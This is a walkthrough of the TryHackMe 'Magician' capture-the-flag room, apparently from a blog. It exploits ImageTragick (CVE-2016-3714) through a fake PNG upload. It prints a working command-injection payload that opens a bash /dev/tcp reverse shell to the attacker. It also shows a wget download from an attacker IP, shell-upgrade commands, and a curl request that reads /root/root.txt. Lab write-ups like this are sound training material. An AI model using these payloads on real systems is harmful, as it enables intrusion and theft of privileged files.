TryHackMe Magician Report

https://tryhackme.com/room/magician

  • A web application that converts user-uploaded PNG images to JPG images uses ImageMagick, a package commonly used by web services to process images.  The version of ImageMagick used is susceptible to multiple vulnerabilities, as described by CVE-2016-3714.  
  • A PoC malicious file is amended in order to execute system commands when uploaded and parsed by the web application.  This can be used to achieve a reverse shell connection as the low-privileged magician.
  • The user flag is found in /home/magician/user.txt
  • Examining the open ports on the machine reveals an internal port: 127.0.0.1:6666.  This is a web application that reads and prints the contents of files on the machine.  
  • The root flag, /root/root.txt can be read with this method. 

  • Port 21, FTP
    • An anonymous login was attempted but failed.  Instead, a message leading to https://imagetragick.com was found. 
  • Port 8081, HTTP
    • The room instructions say to add ‘magician’ to /etc/hosts file
    • No other directories found

Searching ExploitDB shows various ImageMagick exploits.  The relevant exploit ID is 39767.  This exploit describes how ImageMagick doesn’t check the first XX number of bytes of the uploaded file to confirm it is, in fact, an image file.  That means a text file with malicious payload can be saved with a ‘.png’ extension and be uploaded.

A proof-of-concept malicious file is shown:

The system command to run is appended to an image url.  After some trial and error, a successful attempt at remote code execution was achieved:

For this particular machine, the URL specified before the system command should point to a nonexistent image on the localhost: https://127.0.0.1/swag.jpg.

Following the URL is the system command to run, encased in double quotes and preceded by a semi-colon: ";wget http://10.13.4.118:8000/onepiece.png"

This payload downloaded an image file to the target, from the attacking machine. 

 

 

The malicious payload to achieve a reverse shell is:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/swag.jpg";bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1")'
pop graphic-context

Save this payload to a file, ‘reverse.png’ and upload to magician. This will establish a connection to the netcat listener:

Upgrade to a tty shell with:

python -c 'import pty; pty.spawn("/bin/bash")'

Upgrade to a full-interactive shell with:

export TERM=xterm
CTRL+Z
stty -echo raw;fg
ENTER
ENTER

Now, can use arrow keys, tab-completion, and Ctrl+C without exiting the shell. 

The user flag is found in /home/magician/user.txt:

 

Linpeas.sh privilege escalation enumeration script was transferred to the target with python3 http server.  The relevant results from the script are internal open/listening ports that were not exposed with Nmap:

Here, port 6666 on the localhost is open.  This port is only accessible on the target machine.  Port forwarding would allow an attacker to access this port, but before that route is explored, a simple check can be used to determine if it is a web application with cURL: 

The source code of the web application is printed, and a simple POST form is displayed.  It looks like the form only has one input, and it is a filename.  

cURL can be used to send POST data.  Maybe the root flag can be read with this method. 

curl -X POST -d 'filename=/root/root.txt' http://127.0.0.1:6666

The response includes a new section that was not there before.  This section is a bunch of binary.  When decoded into ASCII text, it is the root flag!  No need to port forward in this case. 

Leave a Reply